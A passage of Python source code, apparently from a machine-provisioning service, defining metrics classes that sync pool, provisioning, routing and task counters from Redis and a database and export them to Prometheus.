_KEY_INFO_UPDATED_TIMESTAMP = 'metrics.pool.{poolname}.{info}.updated_timestamp'
poolname: str
enabled: bool
routing_enabled: bool
resources: PoolResourcesMetrics
costs: PoolCostsMetrics
current_guest_request_count: int
current_guest_request_count_per_state: Dict[GuestState, int]
errors: Dict[str, int]
image_info_updated_timestamp: Optional[float]
flavor_info_updated_timestamp: Optional[float]
# commandname => count
cli_calls: Dict[str, int]
# commandname:exitcode => count
cli_calls_exit_codes: Dict[Tuple[str, str], int]
# bucket:commandname => count
cli_calls_durations: Dict[Tuple[str, str], int]
def __init__(self, poolname: str) -> None:
"""
Metrics of a particular pool.
:param poolname: name of the pool whose metrics we're tracking.
"""
self.key_errors = self._KEY_ERRORS.format(poolname=poolname)
self.key_image_info_refresh_timestamp = self._KEY_INFO_UPDATED_TIMESTAMP.format(
poolname=poolname,
info='image'
)
self.key_flavor_info_refresh_timestamp = self._KEY_INFO_UPDATED_TIMESTAMP.format(
poolname=poolname,
info='flavor'
)
self.key_cli_calls = self._KEY_CLI_CALLS.format(poolname=poolname)
self.key_cli_calls_exit_codes = self._KEY_CLI_EXIT_CODES.format(poolname=poolname)
self.key_cli_calls_durations = self._KEY_CLI_CALLS_DURATIONS.format(poolname=poolname)
self.poolname = poolname
self.enabled = False
self.routing_enabled = True
self.resources = PoolResourcesMetrics(poolname)
self.costs = PoolCostsMetrics(poolname)
self.current_guest_request_count = 0
self.current_guest_request_count_per_state = {}
self.errors = {}
self.image_info_updated_timestamp = None
self.flavor_info_updated_timestamp = None
self.cli_calls = {}
self.cli_calls_exit_codes = {}
self.cli_calls_durations = {}
self.__post_init__()
@staticmethod
@with_context
def _refresh_info_updated_timestamp(
pool: str,
info: str,
cache: redis.Redis
) -> Result[None, Failure]:
safe_call(
cast(Callable[[str, float], None], cache.set),
PoolMetrics._KEY_INFO_UPDATED_TIMESTAMP.format(poolname=pool, info=info),
datetime.datetime.timestamp(datetime.datetime.utcnow())
)
return Ok(None)
@staticmethod
def refresh_image_info_updated_timestamp(
pool: str
) -> Result[None, Failure]:
"""
Update "latest updated" timestamp of pool image info cache to current time.
:param pool: pool whose cache has been updated.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
return PoolMetrics._refresh_info_updated_timestamp(pool, 'image')
@staticmethod
def refresh_flavor_info_updated_timestamp(
pool: str
) -> Result[None, Failure]:
"""
Update "latest updated" timestamp of pool flavor info cache to current time.
:param pool: pool whose cache has been updated.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
return PoolMetrics._refresh_info_updated_timestamp(pool, 'flavor')
@staticmethod
@with_context
def inc_error(
pool: str,
error: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase counter for a given pool error by 1.
:param pool: pool that provided the instance.
:param error: error to track.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, PoolMetrics._KEY_ERRORS.format(poolname=pool), error)
return Ok(None)
@staticmethod
@with_context
def inc_cli_call(
poolname: str,
commandname: str,
exit_code: int,
duration: float,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase counter for a given CLI command by 1.
:param poolname: pool that executed the command.
:param commandname: command "ID" - something to tell commands and group of commands apart.
:param exit_code: exit code of the command.
:param duration: duration of the command session, in seconds.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
# raw count
inc_metric_field(
logger,
cache,
PoolMetrics._KEY_CLI_CALLS.format(poolname=poolname),
commandname
)
# exit code
inc_metric_field(
logger,
cache,
PoolMetrics._KEY_CLI_EXIT_CODES.format(poolname=poolname),
f'{commandname}:{exit_code}'
)
# duration
bucket = min([threshold for threshold in CLI_CALL_DURATION_BUCKETS if threshold > duration])
inc_metric_field(
logger,
cache,
PoolMetrics._KEY_CLI_CALLS_DURATIONS.format(poolname=poolname), '{}:{}'.format(bucket, commandname))
return Ok(None)
@with_context
def sync(
self,
logger: gluetool.log.ContextAdapter,
session: sqlalchemy.orm.session.Session,
cache: redis.Redis
) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param logger: logger to use for logging.
:param session: DB session to use for DB access.
:param cache: cache instance to use for cache access.
"""
super(PoolMetrics, self).sync()
r_enabled = KNOB_POOL_ENABLED.get_value(session=session, poolname=self.poolname)
if r_enabled.is_error:
r_enabled.unwrap_error().handle(logger)
return
self.enabled = r_enabled.unwrap() or False # True => True, False => False, None => False
# avoid circular imports
from .routing_policies import KNOB_ROUTE_POOL_ENABLED
r_routing_enabled = KNOB_ROUTE_POOL_ENABLED.get_value(session=session, poolname=self.poolname)
# TODO: sync should return Result
if r_routing_enabled.is_error:
r_routing_enabled.unwrap_error().handle(logger)
return
self.routing_enabled = r_routing_enabled.unwrap()
self.current_guest_request_count = cast(
Tuple[int],
session.query(sqlalchemy.func.count(artemis_db.GuestRequest.guestname)) # type: ignore[no-untyped-call]
.filter(artemis_db.GuestRequest.poolname == self.poolname)
.one()
)[0]
self.current_guest_request_count_per_state = {
state: 0
for state in GuestState.__members__.values()
}
self.current_guest_request_count_per_state.update({
GuestState(record[0]): record[1]
for record in cast(
List[Tuple[str, int]],
session.query( # type: ignore[no-untyped-call]
artemis_db.GuestRequest.state,
sqlalchemy.func.count(artemis_db.GuestRequest.state)
)
.filter(artemis_db.GuestRequest.poolname == self.poolname)
.group_by(artemis_db.GuestRequest.state)
.all()
)
})
self.errors = {
errorname: count
for errorname, count in get_metric_fields(logger, cache, self.key_errors).items()
}
updated = cast(
Callable[[str], Optional[bytes]],
cache.get
)(self.key_image_info_refresh_timestamp)
self.image_info_updated_timestamp = updated if updated is None else float(updated)
updated = cast(
Callable[[str], Optional[bytes]],
cache.get
)(self.key_flavor_info_refresh_timestamp)
self.flavor_info_updated_timestamp = updated if updated is None else float(updated)
# commandname => count
self.cli_calls = {
field: count
for field, count in get_metric_fields(
logger,
cache,
self._KEY_CLI_CALLS.format(poolname=self.poolname)
).items()
}
# commandname:exit-code => count
self.cli_calls_exit_codes = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(
logger,
cache,
self.key_cli_calls_exit_codes
).items()
}
# bucket:commandname => count
self.cli_calls_durations = {
cast(Tuple[str, str], tuple(field.split(':', 2))): count
for field, count in get_metric_fields(
logger,
cache,
self._KEY_CLI_CALLS_DURATIONS.format(poolname=self.poolname)).items()
}
@dataclasses.dataclass
class UndefinedPoolMetrics(MetricsBase):
"""
Metrics of an "undefined" pool, to handle values for guests that don't belong into any pool (yet).
"""
poolname: str
enabled: bool
routing_enabled: bool
resources: PoolResourcesMetrics
costs: PoolCostsMetrics
current_guest_request_count: int
current_guest_request_count_per_state: Dict[GuestState, int]
errors: Dict[str, int]
image_info_updated_timestamp: Optional[float]
flavor_info_updated_timestamp: Optional[float]
cli_calls: Dict[str, int]
cli_calls_exit_codes: Dict[Tuple[str, str], int]
cli_calls_durations: Dict[Tuple[str, str], int]
def __init__(self, poolname: str) -> None:
"""
Metrics of a particular pool.
:param poolname: name of the pool whose metrics we're tracking.
"""
self.poolname = poolname
self.enabled = False
self.routing_enabled = True
self.resources = PoolResourcesMetrics(poolname)
self.costs = PoolCostsMetrics(poolname)
self.current_guest_request_count = 0
self.current_guest_request_count_per_state = {}
self.errors = {}
self.image_info_updated_timestamp = None
self.flavor_info_updated_timestamp = None
self.cli_calls = {}
self.cli_calls_exit_codes = {}
self.cli_calls_durations = {}
self.__post_init__()
@with_context
def sync(self, logger: gluetool.log.ContextAdapter, session: sqlalchemy.orm.session.Session) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param logger: logger to use for logging.
:param session: DB session to use for DB access.
"""
super(UndefinedPoolMetrics, self).sync()
# NOTE: sqlalchemy overloads operators to construct the conditions, and `is` is not overloaded. Therefore
# in the query, we have to use `==` instead of more Pythonic `is`.
self.current_guest_request_count = cast(
Tuple[int],
session.query(sqlalchemy.func.count(artemis_db.GuestRequest.guestname)) # type: ignore[no-untyped-call]
.filter(artemis_db.GuestRequest.poolname == None) # noqa: E711
.one()
)[0]
self.current_guest_request_count_per_state = {
state: 0
for state in GuestState.__members__.values()
}
self.current_guest_request_count_per_state.update({
GuestState(record[0]): record[1]
for record in cast(
List[Tuple[str, int]],
session.query( # type: ignore[no-untyped-call]
artemis_db.GuestRequest.state,
sqlalchemy.func.count(artemis_db.GuestRequest.state)
)
.filter(artemis_db.GuestRequest.poolname == None) # noqa: E711
.group_by(artemis_db.GuestRequest.state)
.all()
)
})
@dataclasses.dataclass
class PoolsMetrics(MetricsBase):
"""
General metrics shared by pools, and per-pool metrics.
"""
# here is the space left for global pool-related metrics.
pools: Dict[str, Union[PoolMetrics, UndefinedPoolMetrics]] = dataclasses.field(default_factory=dict)
@with_context
def sync(self, logger: gluetool.log.ContextAdapter, session: sqlalchemy.orm.session.Session) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param logger: logger to use for logging.
:param session: DB session to use for DB access.
"""
super(PoolsMetrics, self).sync()
# Avoid circullar imports
from .tasks import get_pools
r_pools = get_pools(logger, session, enabled_only=False)
if r_pools.is_error:
r_pools.unwrap_error().handle(logger)
self.pools = {}
else:
self.pools = {
pool.poolname: PoolMetrics(pool.poolname)
for pool in r_pools.unwrap()
}
self.pools['undefined'] = UndefinedPoolMetrics('undefined')
for metrics in self.pools.values():
metrics.sync()
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
:param registry: Prometheus registry to attach metrics to.
"""
super(PoolsMetrics, self).register_with_prometheus(registry)
def _create_pool_resource_metric(name: str, unit: Optional[str] = None) -> Gauge:
return Gauge(
'pool_resources_{}{}'.format(name, '_{}'.format(unit) if unit else ''),
'Limits and usage of pool {}'.format(name),
['pool', 'dimension'],
registry=registry
)
def _create_network_resource_metric(name: str, unit: Optional[str] = None) -> Gauge:
return Gauge(
'pool_resources_network_{}{}'.format(name, '_{}'.format(unit) if unit else ''),
'Limits and usage of pool network {}'.format(name),
['pool', 'network', 'dimension'],
registry=registry
)
self.POOL_ENABLED = Gauge(
'pool_enabled',
'Current enabled/disabled pool state by pool.',
['pool'],
registry=registry
)
self.POOL_ROUTING_ENABLED = Gauge(
'pool_routing_enabled',
'Current enabled/disabled pool routing state by pool.',
['pool'],
registry=registry
)
self.CURRENT_GUEST_REQUEST_COUNT = Gauge(
'current_guest_request_count',
'Current number of guest requests being provisioned by pool and state.',
['pool', 'state'],
registry=registry
)
self.POOL_ERRORS = Counter(
'pool_errors',
'Overall total number of pool errors, per pool and error.',
['pool', 'error'],
registry=registry
)
self.POOL_COSTS = Counter(
'pool_costs',
'Overall total cost of resources used by a pool, per pool and resource type.',
['pool', 'resource'],
registry=registry
)
self.POOL_RESOURCES_INSTANCES = _create_pool_resource_metric('instances')
self.POOL_RESOURCES_CORES = _create_pool_resource_metric('cores')
self.POOL_RESOURCES_MEMORY = _create_pool_resource_metric('memory', unit='bytes')
self.POOL_RESOURCES_DISKSPACE = _create_pool_resource_metric('diskspace', unit='bytes')
self.POOL_RESOURCES_SNAPSHOTS = _create_pool_resource_metric('snapshot')
self.POOL_RESOURCES_NETWORK_ADDRESSES = _create_network_resource_metric('addresses')
self.POOL_RESOURCES_UPDATED_TIMESTAMP = _create_pool_resource_metric('updated_timestamp')
self.POOL_IMAGE_INFO_UPDATED_TIMESTAMP = Gauge(
'pool_image_info_updated_timestamp',
'Last time pool image info has been updated.',
['pool'],
registry=registry
)
self.POOL_FLAVOR_INFO_UPDATED_TIMESTAMP = Gauge(
'pool_flavor_info_updated_timestamp',
'Last time pool flavor info has been updated.',
['pool'],
registry=registry
)
self.CLI_CALLS = Counter(
'cli_calls',
'Overall total number of CLI commands executed, per pool and command name.',
['pool', 'command'],
registry=registry
)
self.CLI_CALLS_EXIT_CODES = Counter(
'cli_calls_exit_codes',
'Overall total number of CLI commands exit codes, per pool, command name and exit code.',
['pool', 'command', 'exit_code'],
registry=registry
)
self.CLI_CALLS_DURATIONS = Histogram(
'cli_call_duration_seconds',
'The time spent executing CLI commands, by pool and command name.',
['pool', 'command'],
buckets=CLI_CALL_DURATION_BUCKETS,
registry=registry
)
def update_prometheus(self) -> None:
"""
Update values of Prometheus metric instances with the data in this container.
"""
super(PoolsMetrics, self).update_prometheus()
reset_counters(self.POOL_ERRORS)
reset_counters(self.POOL_COSTS)
reset_counters(self.CLI_CALLS)
reset_counters(self.CLI_CALLS_EXIT_CODES)
reset_histogram(self.CLI_CALLS_DURATIONS)
for poolname, pool_metrics in self.pools.items():
self.POOL_ENABLED.labels(pool=poolname).set(1 if pool_metrics.enabled else 0)
self.POOL_ROUTING_ENABLED.labels(pool=poolname).set(1 if pool_metrics.routing_enabled else 0)
for state in pool_metrics.current_guest_request_count_per_state:
self.CURRENT_GUEST_REQUEST_COUNT \
.labels(poolname, state.value) \
.set(pool_metrics.current_guest_request_count_per_state[state])
for error, count in pool_metrics.errors.items():
self.POOL_ERRORS.labels(pool=poolname, error=error)._value.set(count)
for resource in ResourceType.__members__.values():
value = getattr(pool_metrics.costs, resource.value.replace('-', '_'))
self.POOL_COSTS \
.labels(pool=poolname, resource=resource.value) \
._value.set(value if value is not None else float('NaN'))
for gauge, metric_name in [
(self.POOL_RESOURCES_INSTANCES, 'instances'),
(self.POOL_RESOURCES_CORES, 'cores'),
(self.POOL_RESOURCES_MEMORY, 'memory'),
(self.POOL_RESOURCES_DISKSPACE, 'diskspace'),
(self.POOL_RESOURCES_SNAPSHOTS, 'snapshots')
]:
limit = getattr(pool_metrics.resources.limits, metric_name)
usage = getattr(pool_metrics.resources.usage, metric_name)
gauge \
.labels(pool=poolname, dimension='limit') \
.set(limit if limit is not None else float('NaN'))
gauge \
.labels(pool=poolname, dimension='usage') \
.set(usage if usage is not None else float('NaN'))
for network_name, network_metrics in pool_metrics.resources.limits.networks.items():
self.POOL_RESOURCES_NETWORK_ADDRESSES \
.labels(pool=poolname, dimension='limit', network=network_name) \
.set(network_metrics.addresses if network_metrics.addresses is not None else float('NaN'))
for network_name, network_metrics in pool_metrics.resources.usage.networks.items():
self.POOL_RESOURCES_NETWORK_ADDRESSES \
.labels(pool=poolname, dimension='usage', network=network_name) \
.set(network_metrics.addresses if network_metrics.addresses is not None else float('NaN'))
self.POOL_RESOURCES_UPDATED_TIMESTAMP \
.labels(pool=poolname, dimension='limit') \
.set(pool_metrics.resources.limits.updated_timestamp or float('NaN'))
self.POOL_RESOURCES_UPDATED_TIMESTAMP \
.labels(pool=poolname, dimension='usage') \
.set(pool_metrics.resources.usage.updated_timestamp or float('NaN'))
self.POOL_IMAGE_INFO_UPDATED_TIMESTAMP \
.labels(pool=poolname) \
.set(pool_metrics.image_info_updated_timestamp or float('NaN'))
self.POOL_FLAVOR_INFO_UPDATED_TIMESTAMP \
.labels(pool=poolname) \
.set(pool_metrics.flavor_info_updated_timestamp or float('NaN'))
for commandname, count in pool_metrics.cli_calls.items():
self.CLI_CALLS \
.labels(pool=poolname, command=commandname) \
._value.set(count)
for (commandname, exit_code), count in pool_metrics.cli_calls_exit_codes.items():
self.CLI_CALLS_EXIT_CODES \
.labels(pool=poolname, command=commandname, exit_code=exit_code) \
._value.set(count)
for (bucket_threshold, commandname), count in pool_metrics.cli_calls_durations.items():
bucket_index = CLI_CALL_DURATION_BUCKETS.index(
prometheus_client.utils.INF if bucket_threshold == 'inf' else int(bucket_threshold)
)
self.CLI_CALLS_DURATIONS \
.labels(pool=poolname, command=commandname) \
._buckets[bucket_index] \
.set(count)
self.CLI_CALLS_DURATIONS \
.labels(pool=poolname, command=commandname) \
._sum \
.inc(float(bucket_threshold) * count)
@dataclasses.dataclass
class ProvisioningMetrics(MetricsBase):
"""
Provisioning metrics.
"""
_KEY_PROVISIONING_REQUESTED = 'metrics.provisioning.requested'
_KEY_PROVISIONING_SUCCESS = 'metrics.provisioning.success'
_KEY_FAILOVER = 'metrics.provisioning.failover'
_KEY_FAILOVER_SUCCESS = 'metrics.provisioning.failover.success'
_KEY_PROVISIONING_DURATIONS = 'metrics.provisioning.durations'
requested: int = 0
current: int = 0
success: Dict[str, int] = dataclasses.field(default_factory=dict)
failover: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
failover_success: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
# We want to maybe point fingers on pools where guests are stuck, so include pool name and state as labels.
guest_ages: List[Tuple[GuestState, Optional[str], datetime.timedelta]] = dataclasses.field(default_factory=list)
provisioning_durations: Dict[str, int] = dataclasses.field(default_factory=dict)
@staticmethod
@with_context
def inc_requested(
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase :py:attr:`requested` metric by 1.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric(logger, cache, ProvisioningMetrics._KEY_PROVISIONING_REQUESTED)
return Ok(None)
@staticmethod
@with_context
def inc_success(
pool: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase :py:attr:`success` metric by 1.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param pool: pool that provided the instance.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, ProvisioningMetrics._KEY_PROVISIONING_SUCCESS, pool)
return Ok(None)
@staticmethod
@with_context
def inc_failover(
from_pool: str,
to_pool: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase pool failover metric by 1.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param from_pool: name of the originating pool.
:param to_pool: name of the replacement pool.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, ProvisioningMetrics._KEY_FAILOVER, '{}:{}'.format(from_pool, to_pool))
return Ok(None)
@staticmethod
@with_context
def inc_failover_success(
from_pool: str,
to_pool: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase successfull pool failover meric by 1.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param from_pool: name of the originating pool.
:param to_pool: name of the replacement pool.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, ProvisioningMetrics._KEY_FAILOVER_SUCCESS, '{}:{}'.format(from_pool, to_pool))
return Ok(None)
@staticmethod
@with_context
def inc_provisioning_durations(
duration: int,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment provisioning duration bucket by one.
The bucket is determined by the upper bound of the given ``duration``.
:param logger: logger to use for logging.
:param duration: how long, in milliseconds, took actor to finish the task.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
bucket = min([threshold for threshold in PROVISION_DURATION_BUCKETS if threshold > duration])
inc_metric_field(logger, cache, ProvisioningMetrics._KEY_PROVISIONING_DURATIONS, '{}'.format(bucket))
return Ok(None)
@with_context
def sync(
self,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis,
session: sqlalchemy.orm.session.Session
) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param logger: logger to use for logging.
:param session: DB session to use for DB access.
:param cache: cache instance to use for cache access.
"""
super(ProvisioningMetrics, self).sync()
NOW = datetime.datetime.utcnow()
current_record = session.query( # type: ignore[no-untyped-call]
sqlalchemy.func.count(artemis_db.GuestRequest.guestname)
)
self.current = current_record.scalar()
self.requested = get_metric(logger, cache, self._KEY_PROVISIONING_REQUESTED) or 0
self.success = {
poolname: count
for poolname, count in get_metric_fields(logger, cache, self._KEY_PROVISIONING_SUCCESS).items()
}
# fields are in form `from_pool:to_pool`
self.failover = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_FAILOVER).items()
}
# fields are in form `from_pool:to_pool`
self.failover_success = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_FAILOVER_SUCCESS).items()
}
# Using `query` directly, because we need just limited set of fields, and we need our `Query`
# and `SafeQuery` to support this functionality (it should be just a matter of correct types).
self.guest_ages = [
(record[0], record[1], NOW - record[2])
for record in cast(
List[Tuple[GuestState, Optional[str], datetime.datetime]],
session.query( # type: ignore[no-untyped-call]
artemis_db.GuestRequest.state,
artemis_db.GuestRequest.poolname,
artemis_db.GuestRequest.ctime
).all()
)
]
self.provisioning_durations = {
field: count
for field, count in get_metric_fields(logger, cache, self._KEY_PROVISIONING_DURATIONS).items()
}
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
:param registry: Prometheus registry to attach metrics to.
"""
super(ProvisioningMetrics, self).register_with_prometheus(registry)
self.CURRENT_GUEST_REQUEST_COUNT_TOTAL = Gauge(
'current_guest_request_count_total',
'Current total number of guest requests being provisioned.',
registry=registry
)
self.OVERALL_PROVISIONING_COUNT = Counter(
'overall_provisioning_count',
'Overall total number of all requested guest requests.',
registry=registry
)
self.OVERALL_SUCCESSFULL_PROVISIONING_COUNT = Counter(
'overall_successfull_provisioning_count',
'Overall total number of all successfully provisioned guest requests by pool.',
['pool'],
registry=registry
)
self.OVERALL_FAILOVER_COUNT = Counter(
'overall_failover_count',
'Overall total number of failovers to another pool by source and destination pool.',
['from_pool', 'to_pool'],
registry=registry
)
self.OVERALL_SUCCESSFULL_FAILOVER_COUNT = Counter(
'overall_successfull_failover_count',
'Overall total number of successful failovers to another pool by source and destination pool.',
['from_pool', 'to_pool'],
registry=registry
)
self.GUEST_AGES = Gauge(
'guest_request_age',
'Guest request ages by pool and state.',
['pool', 'state', 'age_threshold'],
registry=registry
)
self.PROVISION_DURATIONS = Histogram(
'provisioning_duration_seconds',
'The time spent provisioning a machine.',
[],
buckets=PROVISION_DURATION_BUCKETS,
registry=registry,
)
def update_prometheus(self) -> None:
"""
Update values of Prometheus metric instances with the data in this container.
"""
super(ProvisioningMetrics, self).update_prometheus()
self.CURRENT_GUEST_REQUEST_COUNT_TOTAL.set(self.current)
self.OVERALL_PROVISIONING_COUNT._value.set(self.requested)
for pool, count in self.success.items():
self.OVERALL_SUCCESSFULL_PROVISIONING_COUNT.labels(pool=pool)._value.set(count)
for (from_pool, to_pool), count in self.failover.items():
self.OVERALL_FAILOVER_COUNT.labels(from_pool=from_pool, to_pool=to_pool)._value.set(count)
for (from_pool, to_pool), count in self.failover_success.items():
self.OVERALL_SUCCESSFULL_FAILOVER_COUNT.labels(from_pool=from_pool, to_pool=to_pool)._value.set(count)
reset_counters(self.GUEST_AGES)
for state, poolname, age in self.guest_ages:
# Pick the smallest larger bucket threshold (e.g. age == 250 => 300, age == 3599 => 3600, ...)
# There's always the last threshold, infinity, so the list should never be empty.
age_threshold = min([threshold for threshold in GUEST_AGE_BUCKETS if threshold > age.total_seconds()])
self.GUEST_AGES.labels(state=state, pool=poolname, age_threshold=age_threshold).inc()
# Set each bucket to number of observations, and each sum to (observations * bucket threshold)
# since we don't track the exact duration, just what bucket it falls into.
reset_histogram(self.PROVISION_DURATIONS)
for bucket_threshold, count in self.provisioning_durations.items():
bucket_index = PROVISION_DURATION_BUCKETS.index(
prometheus_client.utils.INF if bucket_threshold == 'inf' else int(bucket_threshold)
)
self.PROVISION_DURATIONS._buckets[bucket_index].set(count)
self.PROVISION_DURATIONS._sum.inc(int(bucket_threshold) * count)
@dataclasses.dataclass
class RoutingMetrics(MetricsBase):
"""
Routing metrics.
"""
_KEY_CALLS = 'metrics.routing.policy.calls'
_KEY_CANCELLATIONS = 'metrics.routing.policy.cancellations'
_KEY_RULINGS = 'metrics.routing.policy.rulings'
policy_calls: Dict[str, int] = dataclasses.field(default_factory=dict)
policy_cancellations: Dict[str, int] = dataclasses.field(default_factory=dict)
policy_rulings: Dict[Tuple[str, str, str], int] = dataclasses.field(default_factory=dict)
@staticmethod
@with_context
def inc_policy_called(
policy_name: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase "policy called to make ruling" metric by 1.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param policy_name: policy that was called to make ruling.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, RoutingMetrics._KEY_CALLS, policy_name)
return Ok(None)
@staticmethod
@with_context
def inc_policy_canceled(
policy_name: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase "policy canceled a guest request" metric by 1.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param policy_name: policy that made the decision.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, RoutingMetrics._KEY_CANCELLATIONS, policy_name)
return Ok(None)
@staticmethod
@with_context
def inc_pool_allowed(
policy_name: str,
pool_name: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase "pool allowed by policy" metric by 1.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param policy_name: policy that made the decision.
:param pool_name: pool that was allowed.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, RoutingMetrics._KEY_RULINGS, '{}:{}:yes'.format(policy_name, pool_name))
return Ok(None)
@staticmethod
@with_context
def inc_pool_excluded(
policy_name: str,
pool_name: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase "pool excluded by policy" metric by 1.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param policy_name: policy that made the decision.
:param pool_name: pool that was excluded.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, RoutingMetrics._KEY_RULINGS, '{}:{}:no'.format(policy_name, pool_name))
return Ok(None)
@with_context
def sync(
self,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
"""
super(RoutingMetrics, self).sync()
self.policy_calls = {
field: count
for field, count in get_metric_fields(logger, cache, self._KEY_CALLS).items()
}
self.policy_cancellations = {
field: count
for field, count in get_metric_fields(logger, cache, self._KEY_CANCELLATIONS).items()
}
# fields are in form `policy:pool:allowed`
self.policy_rulings = {
cast(Tuple[str, str, str], tuple(field.split(':', 2))): count
for field, count in get_metric_fields(logger, cache, self._KEY_RULINGS).items()
}
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
:param registry: Prometheus registry to attach metrics to.
"""
super(RoutingMetrics, self).register_with_prometheus(registry)
self.OVERALL_POLICY_CALLS_COUNT = Counter(
'overall_policy_calls_count',
'Overall total number of policy call by policy name.',
['policy'],
registry=registry
)
self.OVERALL_POLICY_CANCELLATIONS_COUNT = Counter(
'overall_policy_cancellations_count',
'Overall total number of policy canceling a guest request by policy name.',
['policy'],
registry=registry
)
self.OVERALL_POLICY_RULINGS_COUNT = Counter(
'overall_policy_rulings_count',
'Overall total number of policy rulings by policy name, pool name and whether the pool was allowed.',
['policy', 'pool', 'allowed'],
registry=registry
)
def update_prometheus(self) -> None:
"""
Update values of Prometheus metric instances with the data in this container.
"""
super(RoutingMetrics, self).update_prometheus()
for policy_name, count in self.policy_calls.items():
self.OVERALL_POLICY_CALLS_COUNT.labels(policy=policy_name)._value.set(count)
for policy_name, count in self.policy_cancellations.items():
self.OVERALL_POLICY_CANCELLATIONS_COUNT.labels(policy=policy_name)._value.set(count)
for (policy_name, pool_name, allowed), count in self.policy_rulings.items():
self.OVERALL_POLICY_RULINGS_COUNT \
.labels(policy=policy_name, pool=pool_name, allowed=allowed) \
._value.set(count)
@dataclasses.dataclass
class TaskMetrics(MetricsBase):
"""
Task and actor metrics.
"""
overall_message_count: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
overall_errored_message_count: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
overall_retried_message_count: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
overall_rejected_message_count: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
current_message_count: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
current_delayed_message_count: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
message_durations: Dict[Tuple[str, str, str, str], int] = dataclasses.field(default_factory=dict)
_KEY_OVERALL_MESSAGES = 'metrics.tasks.messages.overall'
_KEY_OVERALL_ERRORED_MESSAGES = 'metrics.tasks.messages.overall.errored'
_KEY_OVERALL_RETRIED_MESSAGES = 'metrics.tasks.messages.overall.retried'
_KEY_OVERALL_REJECTED_MESSAGES = 'metrics.tasks.messages.overall.rejected'
_KEY_CURRENT_MESSAGES = 'metrics.tasks.messages.current'
_KEY_CURRENT_DELAYED_MESSAGES = 'metrics.tasks.messages.current.delayed'
_KEY_MESSAGE_DURATIONS = 'metrics.tasks.messages.durations'
@staticmethod
@with_context
def inc_overall_messages(
queue: str,
actor: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of all encountered messages.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, TaskMetrics._KEY_OVERALL_MESSAGES, '{}:{}'.format(queue, actor))
return Ok(None)
